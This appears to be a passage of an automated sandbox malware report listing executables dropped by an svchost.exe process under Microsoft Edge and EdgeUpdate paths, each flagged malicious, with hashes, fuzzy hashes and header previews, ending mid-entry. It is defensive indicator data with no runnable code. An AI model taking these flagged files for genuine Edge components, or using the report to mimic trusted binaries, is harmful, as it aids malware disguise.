                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:49C5651B27B2DA9FF703A7D0D9CAE6A7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:87986E31BD8F3251563A90F93D61270EB0DF2671
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A8C31ED1BF10AE7CA926327521B1C35474250DD4CD9FF6F93F7B01CA9DCA3D84
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:458BC8AC74A89012788631FD85AF5E6F691D650974B67F01B9A71EACD67F9E137ECAEB2877E22A80AECBE9B905A3814FC3FC5EFD740845A96D74FCBF5770EAB0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......2C... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1238528
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.146927217187632
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:73w1uVdSEjbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:7EyTbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C884DF6EC549EB44B570D614E7D23CE3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6BB3E9DCF0A4473A45D73465DE7B08D7478F51F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EA4905FA59DC1926BBDD33582156666745BA5B0F615837196DE7A1F78B1BA8F0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC9F1BDA7BD28CCA7DBCF1C211990D0B5C4C3573ADC9ACF898692746B8D509092C67E2FA75C5FF76C2470E52CB1B0A84AA09B9BF074D5693C15531AFB66FEF5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P........... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.04997146349551
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:LhDdVrQ95RW0YEHyWQXE/09Val0GBDmg27RnWGj:LhHYW+HyWKiD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65611321C594D4EC8606881B5B2236C0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A0DEE1650B6B5E2F55F7F47277366A448B819D06
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:44081FE58D557B07E0875D31AFA181D88F558B79A6306D1B886B8BFD7D21053E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:447BF1E5F3C5E784A29DC3955C782FFDD237383F2B12D8A1F2E873425CED482DA82F0544E00B65C5D6441B4953941D74C132665EA4C11448E3CB9051B7B8F2AC
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......#$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.158469030752444
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:770E0ZCQZMiU6Rrt9RoctGfmddcsqjnhMgeiCl7G0nehbGZpbD:n0EzQSyRPRoc18Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C40870E5E8DF9B69BB277BB4619E2D37
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:58C003907F608A08CF2FB522A18C27F368CC70BF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EB621176078A266B582D240F61E6F36C820C4E59F293AA5A4AF897B7A6268702
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:81924570EF9CB153B8B1FC9A73D46F0012F4AE000A7A597B3D6F6D8B141D9EA37924FE42610AD333823712E0FB59488ADE721BB30876179A183F0E38306FCA8F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......3.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.145451387502088
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:tiD2VmA1YXwHwlklb8boUuWPg2gnsqjnhMgeiCl7G0nehbGZpbD:cD2VmAyiwIb8boQ4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B71AA14C3F415AEACB9197E2F76557CD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C463136788799D00AF5747D448408107CC91FF91
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0744ED50D3DAFC44869D3F9BA68BB62C5DC971CEB82AC73CFCEBA164AEE25623
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2B45519C051A8957DA10980E35B97E3B1518F20BC72B667D9C2A8C8895AE9277D16EC50FBD2446B03FA0415B786AE681A4A22754A71D123D1D4072EC9E35ABD2
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......i..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.950733968447002
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:8fD3zO9ZhBGloizM3HRNr00QDmg27RnWGj:GDaalxzM00QD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:72EC077ED995118A3FD5CCF7685BB624
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:68578D7E7FD05154758A5B3D50950EB2D2FE609B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FE10058250B1979276BD69B7011386EB562EFA945DD95B621D33F630EEADE5AD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:34E3757D01D3636FE2D84C9D24AEA0B3844A36A2F636B77FBA7D7A25B4EFD2EC326A01403FE78664B81123573C3A1049C694E704BD9CBB1C186F918FAD0E5F07
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......9,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.824598199261905
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:YTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhHDmg27RnN:jI72LvkrDpbxJRoIMID527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D41915F87D6289DD80C8631A2B43C115
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:73019EA4B60FCAF2B951DBBD5F87B2DCD5524026
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:35FCA5FF89538A76838857B845E3BD9A3612C142CC2E2AAB5D69ADD4E2B2958E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:41FCE17597DC57E6E8E7E94DEE446A0CEB4C1FEEC0CD4F3767A03360C11814D46950DFC3F9497552F1401532309898C80807D31E73C5790E43DF1909837255E8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.0972150892839165
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:sW9Jml9mmijviMnF+ZxmQWcbLw8VssqjnhMgeiCl7G0nehbGZpbD:sWnm5iOMkjmQWkVYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1BC2C58170B57537CF7BB00F65357D03
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CC387B639D4011052367A82CE90F4EE2C3D36EAA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:47C285352623DA356658253AE738C6A5F3CF759B22054A38904625D4D3CD76B3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3732EA58230E02B12A7D3B6558EAF197D3B82A404E5F207117CE42C7FE578599439374BA12C463BBE3C42C47A6EE746E7FCF1C8A4D00087F67C647E27DAD9B49
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......U ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166328621357368
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:5wNHwoYhua6MtjRO4qbBJTY6mY1uIgusqjnhMgeiCl7G0nehbGZpbD:5wNPdQO7BJTfmEZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:468B1E4680767B4376E2195F58E80971
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:65C4588137B6D4065179A05DF8116FBF243095AF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7F7F8D7D079A55F8A4F652414FF8E8D2F10F42CBB3ECAE0A6B9CAEB3EBB23EE4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D0C7E6642E960D73BD41562AD5E89F7CAD21A4F082A8BFB00111259B51FD4439D49F46EB4428F05DCCB23ECBAE2477969B7E780F05586AE797EAF9D390D3C1EB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.145453893544008
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:niD2VmA1YXwHwlklb8boUuWPg2gnsqjnhMgeiCl7G0nehbGZpbD:iD2VmAyiwIb8boQ4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A17AF5A04F28B218B46D5491E1D715BB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:197D4A858A7E0E9E84549421F6E6B1BEED8F57BD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:790FA1DA7B0507232B9659462BC551FC8AD5BE7895F2513AF6A9677284A1C7DE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE2BB8499D8A6A40081D275C7CE4253103D0AC8A551E22177C48DC16E1B8CA71FDF46DF464113BDC3239489747D7C9F3A46BE3D68F46C3444543F1CF8B42656B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166338468882288
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:XwNHwoYhua6MtjRO4qbBJTY6mY1uIgusqjnhMgeiCl7G0nehbGZpbD:XwNPdQO7BJTfmEZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C25198F0015A88A9970236AA2A15D8EA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FB354D60A7EEA825546FE74ECE474BA22346E6A1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D51561857FD5E97145FEE4A4BCDE327B89347D27181D484CBF1440424A05AC00
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F1FA2FD08D47D75D1D92F4DD491082D15A9A7400BB178F6C2F51B0F06AD9F0723451E14497A63E573B588899C58D29BEA9E3D7BED53F97C1822DD4D3630F7BB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................,e.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.14184929350173
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:i4lbht6BHBsqjnhMgeiCl7G0nehbGZpbD:jlNtqHVDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A94296D9ECF6D76883989F5AF87BA1A3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C40E00E4422167EB72E4A142DA5DE31EB4E5F7EE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:05E48081935CDE0FC6F2EEAB54AC4A11146C0EBAC48C9ABC219FD3901F151101
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AF579D3861A0A6A2FFE3F1B77EF6AA6F587700AECD531DD4F3D0077933D936A04B4173AC9BF9CF84DE87C7943E50AC488CEFE4D7AD0773572A8D59B845453EC4
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.........................................................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.138862449377661
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:pIkOkTB+wlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:pIxkTBVlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4EB57F21B773ACB9DF9D8489C9814D89
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AE2B6CC3E059613763B29D3130641F43AA90211
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B07DB68A64C9A733E06FBE2FD776F8C729464C6576D46A9E7DAD04945D9E4305
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:048C6BD8BD4F948091C191182E1078B9A4D70CA1C2E228C5CAD151944C959D59FDE1C93F971026C2465C7E281C3EA5A79691FDF740A426EBD00C980B7065E307
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.236787193765258
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:F4lssmroC2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:FcssmrYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:88D27EB170F2A41C6DA00B96D9A283B4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3792ED4A016FE44209CDD39E3474361EB1D47B27
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:033CBDDAD41E53993D96ED5A2CE25FE3DBCB44F811112C50913C9DCA26EE695F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7ABB0D3E09C384B06F86D5B1A8227AD5F33EB74AEA56C5AC1EAA9449ABD30FF01E0174B402E9355509BC37890F9654EADB53947490D0951086A427E7F6B5F97B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
